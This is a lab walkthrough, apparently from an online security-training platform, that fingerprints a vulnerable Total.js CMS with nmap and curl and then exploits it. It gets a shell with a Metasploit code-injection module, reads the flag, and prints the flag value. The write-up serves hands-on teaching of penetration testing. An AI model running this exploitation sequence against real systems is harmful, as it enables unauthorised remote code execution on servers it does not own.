Exploiting a Vulnerable Node. JS CMS with Metasploit
Nội Dung Chính
Exploiting a Vulnerable Node. JS CMS with Metasploit
In our lab walkthrough series, we go through selected lab exercises on our AttackDefense Platform. Premium labs require a subscription, but you can sign in for free to try our community labs and view the list of topics — no subscription or VPN required!
Metasploit framework is the most popular and powerful network penetration testing tool, used widely all around the world. The framework provides ready to use exploits, information gathering modules to take advantage of the system’s weaknesses. It has powerful in-built scripts and plugins that allow us to automate the process of exploitation.
- Metasploit Framework
Lab Scenario
We have set up the below scenario in our Attack-Defense labs for our students to practice. The screenshots have been taken from our online lab environment.
Lab: Vulnerable NodeJS CMS
This lab comprises a kali machine with all tools installed on it. The user or practitioner will get a shell command-line interface (CLI) access to the Kali machine, through the web browser.
Challenge Statement
The target server as described below is running vulnerable node.js cms. Your task is to fingerprint the application using command-line tools available on the Kali terminal and then exploit the application using the appropriate Metasploit module.
Objective: Get a shell on the target!
Solution
Step 1: Run a Nmap scan against the target IP.
Command: nmap -sS -sV 192.203.199.3
Scanning target server using nmap
Step 2: We have discovered one open port 8000. We will use the curl to identify the running application.
Command: curl http://192.203.199.3:8000
Running curl on target server
Step 3: We have found /blog/ directory. Run curl on the blog directory to find more information.
Command: curl http://192.203.199.3:8000/blog
Running curl on /blog/
Step 4: The target is running Node.js CMS v11. Search on google “Node.js CMS metasploit” and look for Metasploit exploit modules.
Searching an exploit for nodejs cms
Step 5: TotalJS CMS is vulnerable to widget exec. We will use the following Metasploit module to exploit the target and read the flag.
Metasploit Module: Total.js CMS 12 Widget JavaScript Code Injection
Commands:
msfconsole
use exploit/multi/http/totaljs_cms_widget_exec
set RHOSTS 192.203.199.3
set RPORT 8000
check
exploit -j
sessions -i 1
cat /root/flag
Exploiting target nodejs cms
Checking background session
This reveals the flag to us.
Flag: bef27017f4357ba8c47b858a9b2ca112
References
- TotalJS CMS (https://github.com/totaljs/cms)
- Metasploit Module: (https://www.rapid7.com/db/modules/exploit/multi/http/totaljs_cms_widget_exec)
- Total.js Disclosure Report (https://github.com/beerpwn/CVE/blob/master/Totaljs_disclosure_report/report_final.pdf)
Go beyond walkthroughs with hands-on practice. Subscribe now and gain access to 2000+ lab exercises including this one! We also provide on-demand bootcamps — follow along with instructors as they go through the labs and progressively master in-demand topics regardless of time zone!
